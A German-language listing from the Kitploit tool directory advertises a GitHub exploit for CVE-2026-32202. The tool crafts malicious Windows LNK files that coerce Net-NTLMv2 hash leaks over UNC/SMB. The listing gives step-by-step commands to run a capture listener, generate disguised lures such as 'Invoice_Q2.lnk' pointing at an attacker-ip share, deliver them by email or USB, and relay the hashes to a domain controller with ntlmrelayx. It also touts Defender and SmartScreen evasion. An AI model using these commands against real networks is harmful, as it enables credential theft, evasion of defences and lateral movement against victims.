Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-32202 — Erzeugt bösartige LNK-Dateien, um Net-NTLMv2-Hashes über die Windows-Shell-UNC-Verarbeitung zu erzwingen, mit benutzerdefiniertem SMB-Listener und Relay-Integration für autorisierte Red-Team-Operationen. | Kitploit
Tools/GitHubGitHub/solarlynxsqueeze/cve-2026-32202
Payload-GenerierungExploitationLaterale BewegungPenetrationstestsRed Teaming
GitHubsolarlynxsqueeze/cve-2026-32202

CVE-2026-32202

Erzeugt bösartige LNK-Dateien, um Net-NTLMv2-Hashes über die Windows-Shell-UNC-Verarbeitung zu erzwingen, mit benutzerdefiniertem SMB-Listener und Relay-Integration für autorisierte Red-Team-Operationen.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
12vor 4 MonatenNoch nicht geprüft
Teilen

Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Red-Team- und Penetrationstest-Aktivitäten bestimmt.
Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal.
Nutzung auf eigene Gefahr. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden.

Beschreibung
NTLMv2-Hash-Erzwingung durch unvollständigen Windows-Shell-Schutz-Bypass (CVE-2026-32202). Erzeugt speziell präparierte LNK-Dateien, die beim Öffnen oder in der Vorschau im Explorer eine SMB/UNC-Authentifizierung erzwingen. Geringe Interaktion, funktioniert auf gepatchten Systemen, bei denen der Fix vom April 2026 unzureichend war. Aktiv in Engagements im Einsatz.

Hauptfunktionen

  • Zero-Click-/Minimal-Interaktions-Net-NTLMv2-Leak über bösartige LNK (Explorer-Vorschau + Symbolauflösungspfad).
  • Eigener SMB-Listener zur Hash-Erfassung (kein Responder nötig, sauberere Logs).
  • Stabile Variante mit reduzierter ETW/Defender-Fußabdruck.
  • Teilweiser AMSI/SmartScreen-Bypass-Modus.
  • Bereit für ntlmrelayx-Relay-Ketten (SMB, LDAP, HTTP, etc.).

Was der Exploit tut
Das Tool erstellt eine präparierte .LNK, die die Behandlung von UNC-Pfaden in Target + IconEnvironmentDataBlock / ExtraData-Strukturen durch die Shell missbraucht. Wenn das Opfer den Ordner durchsucht oder die Datei mit der Maus überfährt/in der Vorschau anzeigt, initiiert die Windows-Shell eine SMB-Verbindung zum Angreifer-kontrollierten UNC-Pfad und leakt den Net-NTLMv2-Hash des Rechners/Benutzers. Keine Codeausführung auf dem Ziel – nur Credential-Erzwingung für Relay oder Cracking.

Warum es nützlich ist

  • Schneller Erstzugriff bei internen Pentests / Red-Team-Operationen (besonders in Air-Gapped- oder gehärteten Umgebungen, in denen Phishing eingeschränkt ist).
  • Perfekt für NTLM-Relay auf hochwertige Ziele (DCs, Dateiserver, Exchange, ADCS, etc.).
  • Funktioniert dort, wo klassischer Responder blockiert oder zu laut ist.
  • Hohe Erfolgsrate auf Win10 21H2–22H2, Win11 23H2–26H1, Server 2019–2025 (getestete Builds unten).

Getestet auf

  • Windows 11 24H2 (Build 26100.XXXX)
  • Windows 11 23H2 / 25H2
  • Windows 10 22H2
  • Windows Server 2022 / 2025 (Core + Desktop Experience)
  • Teilweise wirksam nach dem kumulativen Update vom April 2026 (unvollständiger Patch in freier Wildbahn bestätigt).

Abhängigkeiten Installieren: pip install -r requirements.txt

Verwendung

root@kitploit:~
# 1. Erfassungsserver starten (Angreifer-Host)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt

# 2. Bösartige LNK erzeugen
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"

# Optional: stabiler oder Bypass-Modus
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"

# 3. LNK ausliefern (USB, Freigabe, E-Mail-Anhang, OneDrive, etc.)

# 4. Auf Hash im Terminal + Datei warten. Beispiel-Relay:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# oder LDAP-Relay für RBCD, HTTP für ADCS-Zertifikate, etc.

Exploit

href

Einschränkungen

  • Opfer muss mit dem enthaltenden Ordner interagieren (Explorer-Vorschau/Hover ist normalerweise ausreichend).
  • Moderne Netzwerksegmentierung + SMB-Signierung + NTLM-Einschränkungen reduzieren den Relay-Erfolg.
  • Keine vollständige RCE – nur Credential-Material.
  • Patch-Status ist entscheidend; vollständig aktualisierte Systeme ab April 2026+ können die Bypass-Variante erfordern.

Grundursache (kurz)
Unvollständiger Fix in der UNC-Pfad-Bereinigung der Windows-Shell und der ExtraData-Block-Verarbeitung für die LNK-Symbol-/Zielauflösung. Der Schutzmechanismus, der unbefugtes Netzwerk-Spoofing blockieren soll, löst während der Shell-Namespace-Enumeration weiterhin eine NTLM-Authentifizierung aus.

Tool herunterladen